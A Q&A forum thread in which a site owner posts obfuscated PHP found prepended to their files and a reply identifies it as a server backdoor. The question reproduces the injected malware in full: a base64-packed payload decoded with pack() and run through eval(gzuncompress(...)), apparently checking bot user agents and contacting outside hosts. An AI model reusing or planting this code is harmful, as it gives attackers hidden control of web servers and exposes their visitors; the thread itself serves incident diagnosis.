doure8758 2015-12-16 08:31
浏览 105
已采纳

一些代码添加到我的php文件中

<?php /*versio:3.02*/ $GLOBALS["opwnro"]="RVaW5pX3NldAPdYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnMPifaZmVkb3IvMDYwOGV4cGFuc2lvbgoNsMy4wMgjJWWdOZTRMSzhVOGUzc3R3NjAyFaHR0cDovLwifPSFRUUFMmQTb2ZmaHR0cHM6Ly8drBRSFRUUF9IT1NUxMQOEdW5pb24WsoniWpLc2VsZWN0UIPUkVRVUVTVF9VUkkofqU0NSSVBUX05BTUUxdjLUVVFUllfU1RSSU5HibPwjIUgXZGV0ZXJtaW5hdG9yVFYKLgcCjLLmxvZwHfCSFRUUF9ZX0FVVEgXYmFzZTY0X2RlY29kZQDjKdmVyc2lvLQkVLXBocAtzgISFRUUF9FWEVDUEhQvNgkb3V0xksdVb2sqhWyFSFRUUF9VU0VSX0FHRU5UKaRKLAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAAYQKYmxhYnVlbC5uZXQZfvZmFzdGFkZHouY29tsjcL3czLnBocD91PQDsJms9vOJnQ9cGhwJnA9WJnY9eSFrBZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzbHZvOGdTL3lvZFpJMndZREJnRzh6azhaUm8xck1UYVRhSlBNNUtxOWtJY1RTQm1NUG04QlhsdTcvcUE0TWRlOS8rWmR4VlhYZjlxam9Pa1hnVjRERE9jQ0FLQWE1d2tjYVpXK1dGME8rL29SaklZWjM1Vlp4bkR0N0daVldLUHJCV1ViUVFOVW1UTmJWUCtHN2lMSFpLWEhXSW1qU1VkYlV2STYxL2ZZNCtsalJMMWl4Z1VJSGhIVFZxa0xPdjRnS3Y5MUg1R2xWaUw4bzJidWJMNkZPdjJDYlJOa1EydW4vNjhhT1AzbEI3a3NaK2tWZHhpc1dxcURISUszQlZGeGtLY1I0MklrNjByUFB0cW5MenhIOWRlV0t2M0VXZUY4bW9sd1RWY3VXQlM3MG9jbDlXT3hBdStIV1JDTmVvRi9qeHJucUZFMDVUQkFmOHFvQkU0a1I5ZkFFZkJUZEo4bzBEbDV3d1grSk02Q01icEdnQ3Naa2JkaFBHQ1NiY2pwOW5GYzRncmtKVVZjc3ZnNEdBRk1UdElWL01JQVVKbnpaMitPSUwxQTJjbFBoY2JyaUpKQ1c5Ulpha2JnM1czdkJURWE3MlVqZE45L0dSRDVDWGZGbFJCN045WGZoSFJMekZQcEJ1K0VXUmk1WFIxNmZaajRmSHVRTS9Ndm9YdHZzMU1mMnluTy9UMjkrbU14bUZMdmoyajV5ejZmeHBkaitmM2Q3Ly9FWnU4SlJmdnZEMTRmNSsrblUrdi90ait2QTBsNUZCQXVFRzdtcTNZZUdoYmpmM2lDaVNjY2RQOGhKM1RrbkFjYnFzZGlLL0RHRnV4UWpDOVh1VFhYN2FaSXFVS3F0Qm9pNHNjMzlCNnFLdHVva0tsUmZpcU1neStQRGRZTzh0WlRUbU9wdjZKV0xpTWdxOFBWT0hqanNDekE2WE5TbUNwbVdFMzZkejlNYXo4QzRvSkEzbEFuMmZ6eDhIbXFMQ3dkL0YzeG44Zk0vTDZndUNqemR1MGpzbDBIclo3T09BVk5IajkwZm40YWNpREFTRmZQNDVuZjI4ZTdnL28vU3B4TVhuMnhlbzZTK2duTjJuOGhxWm13aHFYN3k2ME9mY3FUNzY5QW1KSjMyTlByZmsveUM5M3daRUlZR0ZkdW9Zb3VrVDJpczNJVS9rQVFaNjZ5Qnpvd1U0aGJmTEpBK3dLQnpza3h1UndGZG5CTEk0OXkvMXVjV1ZPRDF6ai9GUm5lOUhVSk90NHJnSVBEOU92WTNZUytPaWlBalVwRWxadlNUZ0JQYWpIQWwvT1lMQ2lZcndoWHhUT2svU01YaVZYbERnS0gzZEFWU0x2V0tmRjNIV2I4R2w1L3ljemlCRHZ6anBtZHp1QlZHMncxdjdBTUVqUTlJMFdhZmRrQ3lLVFp5MU5GMlZERU9tcE9WcjViMHVXdExZa29aaldSOFJHcXVXbG1hYTBrZ25RNEZWYmx6U0FEYldITmdtbGpRYXltYi91Wmt4Tng5NURJTllBRHpveWthdFhaSTJVdVVSQmJoVDVjUWZWWlUxamFlQU15aDJXUlZWRHBDTWkzT0t0REVNTXJpbTkwbUN3N3pBcmg5QjF6bWtlOXdTOFp6WS8yMFRSa3dHb2NzY3lvMGR5cTI0RVV3K0V3d242RUJrL09JQ25sdExoNnFrR2FvTVlXcWgvSkk4eTVRc1E1NzhremdZcFpNeGsvWU90b2xYbCtLdVdaWTBsclV4Q1R4Qmt3OE11anFTVk1wQWdmR2pBSWl4YVZBR2t1R0xDZFoxblk1MzQ2SW1pSkptREprcXBaTmd6WnhJRTZqS1BzeVBzd1pZa3FWVHdkZW5YWWFMSU5tdUFWN3JVaVQxc1FzQk9RSTdpSXZNQlFSeG5HOTNQNmFPMDFkK3U1dkJPSGlZL1FYaUgyOW50L0JKV3FBTXFqVkI2TnVpY0hjaUVnWUJYZy9LS0lYZUZnWlZ1aHdvSWN6cXozVVdiOXVqdTYvVDVxUTFWNWovOFNnOEg1OU1EMGZUK3orN0hNMWZzT3JvaEYrZ2VvajB3M3BSQS9hNGdRUEhEdmdtd0FiRlhWVUV4bnI0dTFsKzV1dkZnRjBxTDFCOUtIa010S01HNEFFaExiRGRlMTVlOE1xLzRrT1FINUpRczAvRlBodFp0aHlWenFhSUs5Y0Q2Ty9lWk1hUWxZTWRYaU1QOUM4YUVHMEdLbU83cHZWTmV5VnA1eWVaQlFBNWI0anRzZTJPcVVvNlFBalVTck5qTnIzV1d4WnA2a1oyZ3hEbkNtMWlTcHJKZW9Wc21qaE5hOSsrU1lOeG8xYmhFNUZqcDhLQmtrSm1qTUZ1KzZRa2xWYTREaTFya0NwWHVPVHJEOFpybHFTUFRHWTlGMGhGci9MU295c2FPK3NJSFZxU05oNVMwTDZBcWJvMWxsajMyalpYVEp6YkI3dVZWOXVkM1Iwa1dSTlpJd09VRFNjK2c0NUhXVWUxTk5USEFGSnlNMGxhc3d4VDBrMkx1c29Ha05KQmlZbWs2VHBZM0d3NmNWa25NZVNGV1hRV3JVM0FUa3ZsMEFJdkQ3eDJrK2JpdnpSWFZ5SDg1aGpHaU55WkxDWWNhaU41MkdlbHNvMHJrVlZOTDlxczZ0cURtSDhqdXlra0lkeTl4bGxDSVBML2pCWkxrM1RWSU8rZ285blNyQjJkQUFJamVLVjNMUnFPVkdreWxNY3c3V2dUN3ZZdlM2ODZHVC9NRlBsQXZiSnRhaVhKNjdwZXBFdE1kMDYyYjU2V3pIQXM2V05UTm82MG1vQ3dKRitrMnFKOXZ0bVNSZW1tSmgzbkU2UFArRGtpbGNjSEM5a0lTYWREbXpQOXNLQ1RCYTRQaTB3Rld3MnprLzloOHVFUFhRd1BteHE3U0EyZ29iZm5zUDBkSVVPREtlUVoxZmhGeTZIS2F6OFMyNFlCMlBTVE9zQk9udm00Yzk0Qmd5YTk4RWdqZWtqa1BEK3BGcHZETEdnZFZYVUppaGtjN1ZhT0JVQ2owbW5YdE42eEZVUWlSNXhPSFBrUjNiN29obzY2ZXc1TWFwMU0wQkgwRFdQc2RQcDRKQTBuWkExcTRLT2xqUXhMTWpXeXpaenB0NkVwRFRXRDNtTnRDcm9YL3RwUHlJdmk1RVhNUWdCYmIvc292djRZWG9iUy9KRnpDbUdrdjRjVEJtRjhLZnNmVkRRd3N3PT0iKSkpOw";
    if (!function_exists('cnedthhk')){function cnedthhk($a, $b){$c=$GLOBALS['opwnro'];$d=pack('H*','6261736536345f646'.'5636f6465'); return $d(substr($c, $a, $b));};eval(cnedthhk(562,3294));};?>

This was added on top of some of my PHP files. I've tried googling for what it could be, but I cant find anything.

  • 写回答

1条回答 默认 最新

  • dstm2014 2015-12-16 08:55
    关注

    Having used UnPHP to decode that chunk of code (with the results here), it seems like somebody placed a backdoor access to your server in your codes.

    Refer to this detailed StackOverflow answer for an almost line-by-line explanation of the obfuscated codes.

    Note that all of methods of the backdoor access in your .php file is obfuscated. If you compare line-by-line with the codes posted in the answer above, you would notice that both are very, very similar (if not the same).

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥20 数据结构—复杂度分析
  • ¥15 如何使用单链表编写学生信息管理系统?
  • ¥15 完成课题以及ppt 在21号之前完成
  • ¥15 懂的来,你应该知道我在说什么,我需要你的帮助
  • ¥15 关于#java#的问题,请各位专家解答!
  • ¥15 maccms影视模板 制作影视网站失败 求
  • ¥15 stm32按键设置闹钟数进退位不正常
  • ¥15 自己写的测试驱动程序无法启动
  • ¥15 三电平逆变器中点电位平衡问题
  • ¥20 这怎么写啊 java课设